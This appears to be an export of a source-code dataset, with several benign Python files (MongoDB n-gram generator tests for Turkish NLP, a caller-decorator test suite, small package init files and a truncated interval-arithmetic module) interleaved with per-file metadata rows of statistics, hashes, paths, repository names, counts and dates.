print "Found {} distinct surface unigrams with multiple occurrences".format(distinct_surface_unigram_with_multiple_occurrences_count)
distinct_stem_unigram_count = self._count_distinct_stem_unigrams(collection)
print "Found {} distinct stem unigrams".format(distinct_stem_unigram_count)
distinct_stem_unigram_with_multiple_occurrences_count = self._count_distinct_stem_unigrams_with_multiple_occurrences(collection)
print "Found {} distinct stem unigrams with multiple occurrences".format(distinct_stem_unigram_with_multiple_occurrences_count)
distinct_lexeme_unigram_count = self._count_distinct_lexeme_unigrams(collection)
print "Found {} distinct lexeme unigrams".format(distinct_lexeme_unigram_count)
distinct_lexeme_unigram_with_multiple_occurrences_count = self._count_distinct_lexeme_unigrams_with_multiple_occurrences(collection)
print "Found {} distinct lexeme unigrams with multiple occurrences".format(distinct_lexeme_unigram_with_multiple_occurrences_count)
@classmethod
def _count_distinct_surface_unigrams(cls, collection):
keys = "a:this.item_0.word.surface.value, b:this.item_0.word.surface.syntactic_category"
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_surface_unigrams_with_multiple_occurrences(cls, collection):
keys = "a:this.item_0.word.surface.value, b:this.item_0.word.surface.syntactic_category"
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_stem_unigrams(cls, collection):
keys = "a:this.item_0.word.stem.value, b:this.item_0.word.stem.syntactic_category"
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_stem_unigrams_with_multiple_occurrences(cls, collection):
keys = "a:this.item_0.word.stem.value, b:this.item_0.word.stem.syntactic_category"
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_lexeme_unigrams(cls, collection):
keys = "a:this.item_0.word.lemma_root.value, b:this.item_0.word.lemma_root.syntactic_category"
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_lexeme_unigrams_with_multiple_occurrences(cls, collection):
keys = "a:this.item_0.word.lemma_root.value, b:this.item_0.word.lemma_root.syntactic_category"
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
class WordBigramMongodbGeneratorTest(unittest.TestCase):
BULK_INSERT_SIZE = 500
@classmethod
def setUpClass(cls):
super(WordBigramMongodbGeneratorTest, cls).setUpClass()
connection = pymongo.Connection(host="127.0.0.1")
cls.db = connection['trnltk']
def test_create_bigrams_for_parseset_001(self):
self._create_bigrams_for_parseset_n("001")
def test_create_bigrams_for_parseset_002(self):
self._create_bigrams_for_parseset_n("002")
def test_create_bigrams_for_parseset_003(self):
self._create_bigrams_for_parseset_n("003")
def test_create_bigrams_for_parseset_004(self):
self._create_bigrams_for_parseset_n("004")
def test_create_bigrams_for_parseset_005(self):
self._create_bigrams_for_parseset_n("005")
def test_create_bigrams_for_parseset_999(self):
self._create_bigrams_for_parseset_n("999")
def test_inspect_bigrams_for_parseset_001(self):
self._inspect_bigrams_for_parseset_n("001")
def test_inspect_bigrams_for_parseset_002(self):
self._inspect_bigrams_for_parseset_n("002")
def test_inspect_bigrams_for_parseset_003(self):
self._inspect_bigrams_for_parseset_n("003")
def test_inspect_bigrams_for_parseset_004(self):
self._inspect_bigrams_for_parseset_n("004")
def test_inspect_bigrams_for_parseset_005(self):
self._inspect_bigrams_for_parseset_n("005")
def test_inspect_bigrams_for_parseset_999(self):
self._inspect_bigrams_for_parseset_n("999")
def _create_bigrams_for_parseset_n(self, parseset_index):
print "Parsing parse set {} and generating bigrams with occurrence counts".format(parseset_index)
dom = parse(os.path.join(os.path.dirname(__file__), '../../testresources/parsesets/parseset{}.xml'.format(parseset_index)))
parseset = ParseSetBinding.build(dom.getElementsByTagName("parseset")[0])
print "Found {} sentences".format(len(parseset.sentences))
words = [word for sentence in parseset.sentences for word in sentence.words]
print "Found {} words".format(len(words))
print "Found {} parsable words".format(
len(filter(lambda word: not isinstance(word, UnparsableWordBinding), words)))
generator = WordNGramGenerator(2)
collection = self.db['wordBigrams{}'.format(parseset_index)]
# delete everything in the collection
collection.remove({})
bulk_insert_buffer = []
for bigram in generator.iter_ngrams(words):
entity = {
'item_0': bigram[0],
'item_1': bigram[1]
}
bulk_insert_buffer.append(entity)
if len(bulk_insert_buffer) % self.BULK_INSERT_SIZE == 0:
collection.insert(bulk_insert_buffer)
bulk_insert_buffer = []
collection.insert(bulk_insert_buffer)
self._inspect_bigrams_for_parseset_n(parseset_index)
def _inspect_bigrams_for_parseset_n(self, parseset_index):
collection = self.db['wordBigrams{}'.format(parseset_index)]
bigram_count = collection.count()
print "Found {} bigrams".format(bigram_count)
print "Found {} distinct surface-surface bigrams".format(self._calculate_distinct_surface_surface_bigrams(collection))
print "Found {} distinct surface-surface bigrams with multiple occurrences".format(self._calculate_distinct_surface_surface_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct surface-stem bigrams".format(self._calculate_distinct_surface_stem_bigrams(collection))
print "Found {} distinct surface-stem bigrams with multiple occurrences".format(self._calculate_distinct_surface_stem_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct surface-lexeme bigrams".format(self._calculate_distinct_surface_lexeme_bigrams(collection))
print "Found {} distinct surface-lexeme bigrams with multiple occurrences".format(self._calculate_distinct_surface_lexeme_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct stem-surface bigrams".format(self._calculate_distinct_stem_surface_bigrams(collection))
print "Found {} distinct stem-surface bigrams with multiple occurrences".format(self._calculate_distinct_stem_surface_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct stem-stem bigrams".format(self._calculate_distinct_stem_stem_bigrams(collection))
print "Found {} distinct stem-stem bigrams with multiple occurrences".format(self._calculate_distinct_stem_stem_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct stem-lexeme bigrams".format(self._calculate_distinct_stem_lexeme_bigrams(collection))
print "Found {} distinct stem-lexeme bigrams with multiple occurrences".format(self._calculate_distinct_stem_lexeme_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct lexeme-surface bigrams".format(self._calculate_distinct_lexeme_surface_bigrams(collection))
print "Found {} distinct lexeme-surface bigrams with multiple occurrences".format(self._calculate_distinct_lexeme_surface_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct lexeme-stem bigrams".format(self._calculate_distinct_lexeme_stem_bigrams(collection))
print "Found {} distinct lexeme-stem bigrams with multiple occurrences".format(self._calculate_distinct_lexeme_stem_bigrams_with_multiple_occurrences(collection))
print "Found {} distinct lexeme-lexeme bigrams".format(self._calculate_distinct_lexeme_lexeme_bigrams(collection))
print "Found {} distinct lexeme-lexeme bigrams with multiple occurrences".format(self._calculate_distinct_lexeme_lexeme_bigrams_with_multiple_occurrences(collection))
####################################################################
@classmethod
def _calculate_distinct_surface_surface_bigrams(cls, collection):
keys = """
a:this.item_0.word.surface.value, b:this.item_1.word.surface.value,
c:this.item_0.word.surface.syntactic_category, d:this.item_1.word.surface.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_surface_surface_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.surface.value, b:this.item_1.word.surface.value,
c:this.item_0.word.surface.syntactic_category, d:this.item_1.word.surface.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_surface_stem_bigrams(cls, collection):
keys = """
a:this.item_0.word.surface.value, b:this.item_1.word.stem.value,
c:this.item_0.word.surface.syntactic_category, d:this.item_1.word.stem.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_surface_stem_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.surface.value, b:this.item_1.word.stem.value,
c:this.item_0.word.surface.syntactic_category, d:this.item_1.word.stem.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_surface_lexeme_bigrams(cls, collection):
keys = """
a:this.item_0.word.surface.value, b:this.item_1.word.lemma_root.value,
c:this.item_0.word.surface.syntactic_category, d:this.item_1.word.lemma_root.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_surface_lexeme_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.surface.value, b:this.item_1.word.lemma_root.value,
c:this.item_0.word.surface.syntactic_category, d:this.item_1.word.lemma_root.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
####################################################################
@classmethod
def _calculate_distinct_stem_surface_bigrams(cls, collection):
keys = """
a:this.item_0.word.stem.value, b:this.item_1.word.surface.value,
c:this.item_0.word.stem.syntactic_category, d:this.item_1.word.surface.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_stem_surface_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.stem.value, b:this.item_1.word.surface.value,
c:this.item_0.word.stem.syntactic_category, d:this.item_1.word.surface.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_stem_stem_bigrams(cls, collection):
keys = """
a:this.item_0.word.stem.value, b:this.item_1.word.stem.value,
c:this.item_0.word.stem.syntactic_category, d:this.item_1.word.stem.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_stem_stem_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.stem.value, b:this.item_1.word.stem.value,
c:this.item_0.word.stem.syntactic_category, d:this.item_1.word.stem.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_stem_lexeme_bigrams(cls, collection):
keys = """
a:this.item_0.word.stem.value, b:this.item_1.word.lemma_root.value,
c:this.item_0.word.stem.syntactic_category, d:this.item_1.word.lemma_root.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_stem_lexeme_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.stem.value, b:this.item_1.word.lemma_root.value,
c:this.item_0.word.stem.syntactic_category, d:this.item_1.word.lemma_root.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
####################################################################
@classmethod
def _calculate_distinct_lexeme_surface_bigrams(cls, collection):
keys = """
a:this.item_0.word.lemma_root.value, b:this.item_1.word.surface.value,
c:this.item_0.word.lemma_root.syntactic_category, d:this.item_1.word.surface.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_lexeme_surface_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.lemma_root.value, b:this.item_1.word.surface.value,
c:this.item_0.word.lemma_root.syntactic_category, d:this.item_1.word.surface.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_lexeme_stem_bigrams(cls, collection):
keys = """
a:this.item_0.word.lemma_root.value, b:this.item_1.word.stem.value,
c:this.item_0.word.lemma_root.syntactic_category, d:this.item_1.word.stem.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_lexeme_stem_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.lemma_root.value, b:this.item_1.word.stem.value,
c:this.item_0.word.lemma_root.syntactic_category, d:this.item_1.word.stem.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_lexeme_lexeme_bigrams(cls, collection):
keys = """
a:this.item_0.word.lemma_root.value, b:this.item_1.word.lemma_root.value,
c:this.item_0.word.lemma_root.syntactic_category, d:this.item_1.word.lemma_root.syntactic_category
"""
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _calculate_distinct_lexeme_lexeme_bigrams_with_multiple_occurrences(cls, collection):
keys = """
a:this.item_0.word.lemma_root.value, b:this.item_1.word.lemma_root.value,
c:this.item_0.word.lemma_root.syntactic_category, d:this.item_1.word.lemma_root.syntactic_category
"""
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
class WordTrigramMongodbGeneratorTest(unittest.TestCase):
BULK_INSERT_SIZE = 500
@classmethod
def setUpClass(cls):
super(WordTrigramMongodbGeneratorTest, cls).setUpClass()
connection = pymongo.Connection(host="127.0.0.1")
cls.db = connection['trnltk']
def test_create_trigrams_for_parseset_001(self):
self._create_trigrams_for_parseset_n("001")
def test_create_trigrams_for_parseset_002(self):
self._create_trigrams_for_parseset_n("002")
def test_create_trigrams_for_parseset_003(self):
self._create_trigrams_for_parseset_n("003")
def test_create_trigrams_for_parseset_004(self):
self._create_trigrams_for_parseset_n("004")
def test_create_trigrams_for_parseset_005(self):
self._create_trigrams_for_parseset_n("005")
def test_create_trigrams_for_parseset_999(self):
self._create_trigrams_for_parseset_n("999")
def _create_trigrams_for_parseset_n(self, parseset_index):
print "Parsing parse set {} and generating trigrams with occurrence counts".format(parseset_index)
dom = parse(os.path.join(os.path.dirname(__file__), '../../testresources/parsesets/parseset{}.xml'.format(parseset_index)))
parseset = ParseSetBinding.build(dom.getElementsByTagName("parseset")[0])
print "Found {} sentences".format(len(parseset.sentences))
words = [word for sentence in parseset.sentences for word in sentence.words]
print "Found {} words".format(len(words))
print "Found {} parsable words".format(
len(filter(lambda word: not isinstance(word, UnparsableWordBinding), words)))
generator = WordNGramGenerator(3)
collection = self.db['wordTrigrams{}'.format(parseset_index)]
# delete everything in the collection
collection.remove({})
bulk_insert_buffer = []
for trigram in generator.iter_ngrams(words):
entity = {
'item_0': trigram[0],
'item_1': trigram[1],
'item_2': trigram[2]
}
bulk_insert_buffer.append(entity)
if len(bulk_insert_buffer) % self.BULK_INSERT_SIZE == 0:
collection.insert(bulk_insert_buffer)
bulk_insert_buffer = []
collection.insert(bulk_insert_buffer)
trigram_count = collection.count()
print "Generated {} trigrams".format(trigram_count)
class WordUnigramWithParseResultGeneratorMongodbTest(unittest.TestCase):
BULK_INSERT_SIZE = 500
@classmethod
def setUpClass(cls):
super(WordUnigramWithParseResultGeneratorMongodbTest, cls).setUpClass()
connection = pymongo.Connection(host="127.0.0.1")
cls.db = connection['trnltk']
def test_create_unigrams_for_parseset_001(self):
self._create_unigrams_for_parseset_n("001")
def test_create_unigrams_for_parseset_002(self):
self._create_unigrams_for_parseset_n("002")
def test_create_unigrams_for_parseset_003(self):
self._create_unigrams_for_parseset_n("003")
def test_create_unigrams_for_parseset_004(self):
self._create_unigrams_for_parseset_n("004")
def test_create_unigrams_for_parseset_005(self):
self._create_unigrams_for_parseset_n("005")
def test_create_unigrams_for_parseset_999(self):
self._create_unigrams_for_parseset_n("999")
def test_inspect_unigrams_for_parseset_001(self):
self._inspect_unigrams_for_parseset_n("001")
def test_inspect_unigrams_for_parseset_002(self):
self._inspect_unigrams_for_parseset_n("002")
def test_inspect_unigrams_for_parseset_003(self):
self._inspect_unigrams_for_parseset_n("003")
def test_inspect_unigrams_for_parseset_004(self):
self._inspect_unigrams_for_parseset_n("004")
def test_inspect_unigrams_for_parseset_005(self):
self._inspect_unigrams_for_parseset_n("005")
def test_inspect_unigrams_for_parseset_999(self):
self._inspect_unigrams_for_parseset_n("999")
def _create_unigrams_for_parseset_n(self, parseset_index):
print "Parsing parse set {} and generating unigrams with occurrence counts and parse results".format(parseset_index)
dom = parse(os.path.join(os.path.dirname(__file__), '../../testresources/parsesets/parseset{}.xml'.format(parseset_index)))
parseset = ParseSetBinding.build(dom.getElementsByTagName("parseset")[0])
print "Found {} sentences".format(len(parseset.sentences))
words = [word for sentence in parseset.sentences for word in sentence.words]
print "Found {} words".format(len(words))
print "Found {} parsable words".format(
len(filter(lambda word: not isinstance(word, UnparsableWordBinding), words)))
generator = WordUnigramWithParseResultGenerator()
collection = self.db['wordUnigrams{}'.format(parseset_index)]
# delete everything in the collection
collection.remove({})
bulk_insert_buffer = []
for unigram in generator.iter_ngrams(words):
entity = {
'item_0': unigram
}
bulk_insert_buffer.append(entity)
if len(bulk_insert_buffer) % self.BULK_INSERT_SIZE == 0:
collection.insert(bulk_insert_buffer)
bulk_insert_buffer = []
collection.insert(bulk_insert_buffer)
self._inspect_unigrams_for_parseset_n(parseset_index)
def _inspect_unigrams_for_parseset_n(self, parseset_index):
collection = self.db['wordUnigrams{}'.format(parseset_index)]
unigram_count = collection.count()
print "Found {} unigrams".format(unigram_count)
distinct_surface_unigram_count = self._count_distinct_surface_unigrams(collection)
print "Found {} distinct surface unigrams".format(distinct_surface_unigram_count)
distinct_surface_unigram_with_multiple_occurrences_count = self._count_distinct_surface_unigrams_with_multiple_occurrences(collection)
print "Found {} distinct surface unigrams with multiple occurrences".format(distinct_surface_unigram_with_multiple_occurrences_count)
distinct_stem_unigram_count = self._count_distinct_stem_unigrams(collection)
print "Found {} distinct stem unigrams".format(distinct_stem_unigram_count)
distinct_stem_unigram_with_multiple_occurrences_count = self._count_distinct_stem_unigrams_with_multiple_occurrences(collection)
print "Found {} distinct stem unigrams with multiple occurrences".format(distinct_stem_unigram_with_multiple_occurrences_count)
distinct_lexeme_unigram_count = self._count_distinct_lexeme_unigrams(collection)
print "Found {} distinct lexeme unigrams".format(distinct_lexeme_unigram_count)
distinct_lexeme_unigram_with_multiple_occurrences_count = self._count_distinct_lexeme_unigrams_with_multiple_occurrences(collection)
print "Found {} distinct lexeme unigrams with multiple occurrences".format(distinct_lexeme_unigram_with_multiple_occurrences_count)
@classmethod
def _count_distinct_surface_unigrams(cls, collection):
keys = "a:this.item_0.word.surface.value, b:this.item_0.word.surface.syntactic_category"
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_surface_unigrams_with_multiple_occurrences(cls, collection):
keys = "a:this.item_0.word.surface.value, b:this.item_0.word.surface.syntactic_category"
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_stem_unigrams(cls, collection):
keys = "a:this.item_0.word.stem.value, b:this.item_0.word.stem.syntactic_category"
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_stem_unigrams_with_multiple_occurrences(cls, collection):
keys = "a:this.item_0.word.stem.value, b:this.item_0.word.stem.syntactic_category"
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_lexeme_unigrams(cls, collection):
keys = "a:this.item_0.word.lemma_root.value, b:this.item_0.word.lemma_root.syntactic_category"
filter_criteria = None
return _count_distinct_ngrams(collection, keys, filter_criteria)
@classmethod
def _count_distinct_lexeme_unigrams_with_multiple_occurrences(cls, collection):
keys = "a:this.item_0.word.lemma_root.value, b:this.item_0.word.lemma_root.syntactic_category"
filter_criteria = {"value.count": {"$gt": 1}}
return _count_distinct_ngrams(collection, keys, filter_criteria)
if __name__ == '__main__':
unittest.main()
| 45.980769 | 178 | 0.710807 | 3,706 | 31,083 | 5.58122 | 0.055046 | 0.03713 | 0.026107 | 0.03771 | 0.9269 | 0.925063 | 0.901663 | 0.812222 | 0.806904 | 0.74826 | 0 | 0.017289 | 0.192388 | 31,083 | 675 | 179 | 46.048889 | 0.806676 | 0.005019 | 0 | 0.725806 | 0 | 0.096774 | 0.265735 | 0.131358 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.014113 | null | null | 0.100806 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ddfcac0b24fd305734f502f70477de1655db6941 | 173 | py | Python | spdlayers/__init__.py | LLNL/spdlayers | 27e0dc2ac16ed89c559b0ac78fb9cb2784f1e7ca | [
"MIT"
] | null | null | null | spdlayers/__init__.py | LLNL/spdlayers | 27e0dc2ac16ed89c559b0ac78fb9cb2784f1e7ca | [
"MIT"
] | 2 | 2021-12-01T21:02:46.000Z | 2022-02-06T23:05:51.000Z | spdlayers/__init__.py | LLNL/spdlayers | 27e0dc2ac16ed89c559b0ac78fb9cb2784f1e7ca | [
"MIT"
] | null | null | null | from .layers import Cholesky # noqa F401
from .layers import Eigen # noqa F401
from .tools import in_shape_from # noqa F401
from .version import __version__ # noqa F401
| 34.6 | 45 | 0.768786 | 26 | 173 | 4.884615 | 0.423077 | 0.251969 | 0.283465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 0.184971 | 173 | 4 | 46 | 43.25 | 0.815603 | 0.225434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fb0489e0b50e77f881e82b2ff360b7eba3db3ad9 | 5,556 | py | Python | tests/functions.py | luckydonald/python-utils | 455f5174707804a39384776185b8bc307223e19f | [
"MIT"
] | 5 | 2016-12-06T00:49:21.000Z | 2019-10-03T04:18:13.000Z | tests/functions.py | luckydonald/python-utils | 455f5174707804a39384776185b8bc307223e19f | [
"MIT"
] | 5 | 2016-03-19T02:08:14.000Z | 2018-12-01T02:30:19.000Z | tests/functions.py | luckydonald/python-utils | 455f5174707804a39384776185b8bc307223e19f | [
"MIT"
] | null | null | null | import unittest
from luckydonaldUtils.functions import caller, CallerResult
from luckydonaldUtils.logger import logging
logging.add_colored_handler(level=logging.DEBUG)
@caller(0)
def single_level_number(call):
"""
TEst function replying the call arg unchanged
:type call: CallerResult
:rtype: CallerResult
"""
return call
# end def
@caller
def single_level_no_params(call):
"""
TEst function replying the call arg unchanged
:type call: CallerResult
:rtype: CallerResult
"""
return call
# end def
@caller(kwarg_name='different_call')
def single_kwarg_params(different_call):
"""
Test that we can provide a custom attribute.
:type different_call: CallerResult
:rtype: CallerResult
"""
return different_call
# end def
def duo_level_outer():
"""
TesT function replying the call arg unchanged, one level in
Outer/first level.
:rtype: CallerResult
"""
@caller(+1)
def duo_level_inner(call):
"""
TeSt function replying the call arg unchanged, the second level in
:type call: CallerResult
:rtype: CallerResult
"""
return call
# end def
return duo_level_inner()
# end def
class CallerTestCase(unittest.TestCase):
def test_one_level_number(self):
result = single_level_number()
print(repr(result))
self.assertIsNotNone(result['self'], 'single level: self.name (old access style)')
self.assertEqual("single_level_number", result['self']['name'], 'single level: self.name (old access style)')
self.assertIsNotNone(result['caller'], 'single level: caller.name (old access style)')
self.assertEqual("test_one_level_number", result['caller']['name'], 'single level: caller.name (old access style)')
# end def
def test_one_level_new_number(self):
result = single_level_number()
self.assertIsInstance(result, CallerResult, 'caller result should be class CallerResult.')
self.assertIsNotNone(result.self, 'single level: self.name (new access style)')
self.assertEqual("single_level_number", result.self.name, 'single level: self.name (new access style)')
self.assertIsNotNone(result.caller, 'single level: caller.name (new access style)')
self.assertEqual("test_one_level_new_number", result.caller.name, 'single level: caller.name (new access style)')
# end def
def test_one_level_no_params(self):
result = single_level_no_params()
print(repr(result))
self.assertIsNotNone(result['self'], 'single level: self.name (old access style)')
self.assertEqual("single_level_no_params", result['self']['name'], 'single level: self.name (old access style)')
self.assertIsNotNone(result['caller'], 'single level: caller.name (old access style)')
self.assertEqual("test_one_level_no_params", result['caller']['name'], 'single level: caller.name (old access style)')
# end def
def test_one_level_new_no_params(self):
result = single_level_no_params()
self.assertIsInstance(result, CallerResult, 'caller result should be class CallerResult.')
self.assertIsNotNone(result.self, 'single level: self.name (new access style)')
self.assertEqual("single_level_no_params", result.self.name, 'single level: self.name (new access style)')
self.assertIsNotNone(result.caller, 'single level: caller.name (new access style)')
self.assertEqual("test_one_level_new_no_params", result.caller.name, 'single level: caller.name (new access style)')
# end def
def test_two_level(self):
result = duo_level_outer()
self.assertIsNotNone(result, 'duo level (old access style)')
self.assertIsNotNone(result['self'], 'duo level: self.name (old access style)')
self.assertEqual("duo_level_inner", result['self']['name'], 'duo level: self.name (old access style)')
self.assertIsNotNone(result['caller'], 'duo level: caller.name (old access style)')
self.assertEqual("test_two_level", result['caller']['name'], 'duo level: caller.name (old access style)')
# end def
def test_two_level_new(self):
result = duo_level_outer()
self.assertIsNotNone(result, 'single level (new access style)')
self.assertIsInstance(result, CallerResult, 'caller result should be class CallerResult.')
self.assertIsNotNone(result.self, 'single level: self.name (new access style)')
self.assertEqual("duo_level_inner", result.self.name, 'single level: self.name (new access style)')
self.assertIsNotNone(result.caller, 'single level: caller.name (new access style)')
self.assertEqual("test_two_level_new", result.caller.name, 'single level: caller.name (new access style)')
# end def
def test_kwarg(self):
result = single_kwarg_params()
self.assertIsNotNone(result, 'single level (new access style)')
self.assertIsInstance(result, CallerResult, 'caller result should be class CallerResult.')
self.assertIsNotNone(result.self, 'single level: self.name (new access style)')
self.assertEqual("single_kwarg_params", result.self.name, 'single level: self.name (new access style)')
self.assertIsNotNone(result.caller, 'single level: caller.name (new access style)')
self.assertEqual("test_kwarg", result.caller.name, 'single level: caller.name (new access style)')
# end def
# end class
if __name__ == '__main__':
unittest.main()
# end if
| 38.054795 | 126 | 0.692765 | 692 | 5,556 | 5.41185 | 0.098266 | 0.105741 | 0.096128 | 0.076903 | 0.839252 | 0.828838 | 0.800801 | 0.784513 | 0.718825 | 0.687583 | 0 | 0.000445 | 0.191685 | 5,556 | 145 | 127 | 38.317241 | 0.833445 | 0.110691 | 0 | 0.402778 | 0 | 0 | 0.381776 | 0.029608 | 0 | 0 | 0 | 0 | 0.486111 | 1 | 0.166667 | false | 0 | 0.041667 | 0 | 0.291667 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fb25ca89d480d63d62d0a2b93d08468217a19967 | 111 | py | Python | tasks/search-engine/search-engine/search_engine/db/__init__.py | HackerDom/qctf-starter-2016 | 02fde33d0a9e7f107e787077b26e810de6b8e423 | [
"MIT"
] | 6 | 2016-12-08T17:35:46.000Z | 2019-12-05T07:17:26.000Z | tasks/search-engine/search-engine/search_engine/db/__init__.py | HackerDom/qctf-starter-2016 | 02fde33d0a9e7f107e787077b26e810de6b8e423 | [
"MIT"
] | 1 | 2020-06-05T17:28:56.000Z | 2020-06-05T17:28:56.000Z | tasks/search-engine/search-engine/search_engine/db/__init__.py | HackerDom/qctf-starter-2016 | 02fde33d0a9e7f107e787077b26e810de6b8e423 | [
"MIT"
] | 1 | 2017-01-12T17:53:52.000Z | 2017-01-12T17:53:52.000Z | from search_engine.db.links import *
from search_engine.db.texts import *
from search_engine.db.users import *
| 27.75 | 36 | 0.810811 | 18 | 111 | 4.833333 | 0.444444 | 0.344828 | 0.551724 | 0.62069 | 0.551724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 111 | 3 | 37 | 37 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
34b93e2804d5b7dda55f43a2733bb948d964a59b | 8,014 | py | Python | intervals/arithmetic.py | marcodeangelis/intervals | b4ab675e7b01fbda25b990b44553c3b5b922ae1d | [
"MIT"
] | 6 | 2022-02-21T15:38:41.000Z | 2022-03-08T13:55:02.000Z | intervals/arithmetic.py | marcodeangelis/intervals | b4ab675e7b01fbda25b990b44553c3b5b922ae1d | [
"MIT"
] | 4 | 2022-02-21T15:16:39.000Z | 2022-02-21T18:00:44.000Z | intervals/arithmetic.py | marcodeangelis/intervals | b4ab675e7b01fbda25b990b44553c3b5b922ae1d | [
"MIT"
] | null | null | null | """
--------------------------
Created Feb 2022
Marco De Angelis
github.com/marcodeangelis
MIT License
--------------------------
"""
import numpy
def multiply(s,o):
s_lo,s_hi,o_lo,o_hi=s.lo,s.hi,o.lo,o.hi
if s.scalar & o.scalar:
if (s_lo >= 0) & (o_lo >= 0): # A+ B+
l,h = s_lo * o_lo, s_hi * o_hi
if (s_lo>=0) & ((o_lo<0) & (o_hi>0)): # A+ B0
l,h = s_hi * o_lo, s_hi * o_hi
